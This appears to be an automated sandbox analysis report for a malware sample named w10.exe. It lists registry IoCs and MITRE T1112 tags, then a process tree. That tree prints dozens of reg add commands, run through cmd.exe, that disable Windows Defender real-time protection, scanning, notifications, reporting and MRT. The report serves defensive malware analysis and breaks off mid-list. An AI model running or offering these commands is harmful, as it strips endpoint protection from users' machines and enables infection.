Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013\\SyncEngine.dll\\2"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013\\FileSyncShell.dll"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\INTERFACE\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\AppID\{EEABD3A3-784D-4334-AAFC-BB13234F17CF}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\WOW6432NODE\INTERFACE\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TYPELIB	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LOCALSERVER32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013\\FileCoAuth.exe"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\HELPDIR	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\BannerNotificationHandler.BannerNotificationHandler.1	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013\\FileSyncShell.dll"	OneDriveSetup.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
8108	reg.exe
8776	reg.exe
9328	Process not Found
2404	Process not Found
4800	reg.exe
9076	reg.exe
6496	Process not Found
6104	Process not Found
5492	Process not Found
3224	Process not Found
7408	reg.exe
6872	reg.exe
9720	reg.exe
4772	reg.exe
8692	Process not Found
10356	Process not Found
7464	Process not Found
8384	reg.exe
7232	reg.exe
10992	reg.exe
5004	reg.exe
9900	reg.exe
6452	reg.exe
5268	Process not Found
8408	Process not Found
8832	reg.exe
8132	reg.exe
11088	reg.exe
9780	reg.exe
10712	reg.exe
5492	Process not Found
10292	Process not Found
3856	reg.exe
3712	reg.exe
5140	reg.exe
9928	reg.exe
10976	reg.exe
9012	reg.exe
8616	reg.exe
8464	reg.exe
10696	Process not Found
1084	reg.exe
9848	Process not Found
9768	reg.exe
9784	reg.exe
2188	Process not Found
9100	reg.exe
7180	reg.exe
8368	reg.exe
8648	reg.exe
5908	reg.exe
9484	reg.exe
9116	Process not Found
8148	reg.exe
8340	reg.exe
7556	Process not Found
9624	Process not Found
8100	reg.exe
348	Process not Found
7396	reg.exe
9836	reg.exe
5316	Process not Found
9660	reg.exe
4688	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1076	OneDrive.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
5676	OneDriveSetup.exe
5452	OneDriveSetup.exe
5676	OneDriveSetup.exe
5452	OneDriveSetup.exe
6784	OneDriveSetup.exe
6784	OneDriveSetup.exe
7476	OneDriveSetup.exe
7476	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
6392	OneDriveSetup.exe
1076	OneDrive.exe
1076	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5676	OneDriveSetup.exe
Token: SeIncreaseQuotaPrivilege	6392	OneDriveSetup.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1076	OneDrive.exe
1076	OneDrive.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1076	OneDrive.exe
1076	OneDrive.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1076	OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 2200	1756	w10.exe	87
PID 1756 wrote to memory of 2200	1756	w10.exe	87
PID 1756 wrote to memory of 2200	1756	w10.exe	87
PID 1756 wrote to memory of 2396	1756	w10.exe	88
PID 1756 wrote to memory of 2396	1756	w10.exe	88
PID 1756 wrote to memory of 2396	1756	w10.exe	88
PID 1756 wrote to memory of 2140	1756	w10.exe	89
PID 1756 wrote to memory of 2140	1756	w10.exe	89
PID 1756 wrote to memory of 2140	1756	w10.exe	89
PID 1756 wrote to memory of 416	1756	w10.exe	90
PID 1756 wrote to memory of 416	1756	w10.exe	90
PID 1756 wrote to memory of 416	1756	w10.exe	90
PID 1756 wrote to memory of 3704	1756	w10.exe	91
PID 1756 wrote to memory of 3704	1756	w10.exe	91
PID 1756 wrote to memory of 3704	1756	w10.exe	91
PID 1756 wrote to memory of 2596	1756	w10.exe	92
PID 1756 wrote to memory of 2596	1756	w10.exe	92
PID 1756 wrote to memory of 2596	1756	w10.exe	92
PID 1756 wrote to memory of 2228	1756	w10.exe	94
PID 1756 wrote to memory of 2228	1756	w10.exe	94
PID 1756 wrote to memory of 2228	1756	w10.exe	94
PID 1756 wrote to memory of 3812	1756	w10.exe	95
PID 1756 wrote to memory of 3812	1756	w10.exe	95
PID 1756 wrote to memory of 3812	1756	w10.exe	95
PID 1756 wrote to memory of 2088	1756	w10.exe	96
PID 1756 wrote to memory of 2088	1756	w10.exe	96
PID 1756 wrote to memory of 2088	1756	w10.exe	96
PID 1756 wrote to memory of 1440	1756	w10.exe	97
PID 1756 wrote to memory of 1440	1756	w10.exe	97
PID 1756 wrote to memory of 1440	1756	w10.exe	97
PID 1756 wrote to memory of 968	1756	w10.exe	98
PID 1756 wrote to memory of 968	1756	w10.exe	98
PID 1756 wrote to memory of 968	1756	w10.exe	98
PID 1756 wrote to memory of 1200	1756	w10.exe	99
PID 1756 wrote to memory of 1200	1756	w10.exe	99
PID 1756 wrote to memory of 1200	1756	w10.exe	99
PID 1756 wrote to memory of 4836	1756	w10.exe	100
PID 1756 wrote to memory of 4836	1756	w10.exe	100
PID 1756 wrote to memory of 4836	1756	w10.exe	100
PID 1756 wrote to memory of 1080	1756	w10.exe	101
PID 1756 wrote to memory of 1080	1756	w10.exe	101
PID 1756 wrote to memory of 1080	1756	w10.exe	101
PID 1756 wrote to memory of 4680	1756	w10.exe	102
PID 1756 wrote to memory of 4680	1756	w10.exe	102
PID 1756 wrote to memory of 4680	1756	w10.exe	102
PID 1756 wrote to memory of 4928	1756	w10.exe	103
PID 1756 wrote to memory of 4928	1756	w10.exe	103
PID 1756 wrote to memory of 4928	1756	w10.exe	103
PID 1756 wrote to memory of 1612	1756	w10.exe	104
PID 1756 wrote to memory of 1612	1756	w10.exe	104
PID 1756 wrote to memory of 1612	1756	w10.exe	104
PID 1756 wrote to memory of 4564	1756	w10.exe	105
PID 1756 wrote to memory of 4564	1756	w10.exe	105
PID 1756 wrote to memory of 4564	1756	w10.exe	105
PID 1756 wrote to memory of 2920	1756	w10.exe	106
PID 1756 wrote to memory of 2920	1756	w10.exe	106
PID 1756 wrote to memory of 2920	1756	w10.exe	106
PID 1756 wrote to memory of 1136	1756	w10.exe	107
PID 1756 wrote to memory of 1136	1756	w10.exe	107
PID 1756 wrote to memory of 1136	1756	w10.exe	107
PID 1756 wrote to memory of 3012	1756	w10.exe	108
PID 1756 wrote to memory of 3012	1756	w10.exe	108
PID 1756 wrote to memory of 3012	1756	w10.exe	108
PID 1756 wrote to memory of 3988	1756	w10.exe	109

C:\Users\Admin\AppData\Local\Temp\w10.exe
"C:\Users\Admin\AppData\Local\Temp\w10.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:8180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:3608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2140
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:9060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:3704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:8000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:7812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:8472
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:8108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    PID:8460
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:1440
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:9068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:6880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:8392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:4680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:4928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:8612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:8372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:4564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:8012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:8620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:1136
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:7984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9024
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:4036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:8612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:8004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2996
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:8008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:3656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:6252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:4084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:8128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:6896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:5960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:4496
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:7976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
